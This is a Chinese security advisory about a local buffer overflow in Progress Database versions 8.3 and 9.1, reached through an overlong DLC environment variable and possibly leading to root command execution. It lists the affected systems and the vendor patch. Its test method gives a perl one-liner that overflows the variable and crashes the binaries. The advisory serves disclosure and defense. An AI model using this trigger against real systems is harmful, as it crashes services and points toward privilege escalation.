发布日期：2003-04-03
更新日期：2003-04-15

受影响系统：

Progress Database 9.1D
Progress Database 9.1C
Progress Database 9.1B
Progress Database 8.3V
Progress Database 8.3E
Progress Database 8.3D
    - HP HP-UX 11.0
    - IBM AIX 4.3.3
    - Microsoft Windows NT 4.0 SP6a
    - Microsoft Windows NT 4.0 SP5
    - Microsoft Windows 2000 Server SP3
    - Microsoft Windows 2000 Server SP2
    - Microsoft Windows 2000 Server SP1
    - Microsoft Windows 2000 Server
    - RedHat Linux 7.1
    - RedHat Linux 7.0
    - RedHat Linux 6.2
    - Sun Solaris 2.6
    - SuSE Linux 7.2

描述：

---

BUGTRAQ  ID: 7312

Progress是一款商业性质的数据库系统，可使用在Microsoft Windows和Unix操作系统下。

Progress在读取'DLC'环境变量时缺少正确缓冲区边界检查，本地攻击者可以利用这个漏洞进行缓冲区溢出攻击，可能以root用户权限在系统上执行任意指令。

DLC环境变量可指示Progress哪里可以找到安装目录，当Progress请求和使用DLC变量时缺少正确的边界检查，攻击者提供超长的DLC环境变量，可触发缓冲区溢出攻击，精心构建环境变量数据可能以root用户权限在系统上执行任意指令。

<*来源：KF （dotslash@snosoft.com）
  
  链接：http://marc.theaimsgroup.com/?l=bugtraq&m=105013076019433&w=2
*>

测试方法：

---

警 告

以下程序(方法)可能带有攻击性，仅供安全研究与教学之用。使用者风险自负！

KF （dotslash@snosoft.com）提供了如下测试方法：

bash-2.03$ export DLC=`perl -e 'print "A" x 9000'`

bash-2.03$ export PROMSGS=/path/to/promsgs

bash-2.03$ /u/dlctk/_proutil
SYSTEM ERROR: strent request for more than 32K (893)
** Please save file named core for analysis by PSC. (439)
Quit (core dumped)

bash-2.03$ /u/dlc6/_mprosrv
11:48:07 SYSTEM ERROR: strent request for more than 32K (893)
11:48:07 ** Please save file named core for analysis by PSC. (439)
Quit

建议：

---

厂商补丁：

Progress
--------
目前厂商已经发布了升级补丁以修复这个安全问题，请到厂商的主页下载：

Progress Upgrade Progress Database 9.1D05
http://www.progress.com/patches/

浏览次数：3485
严重程度：0（网友投票）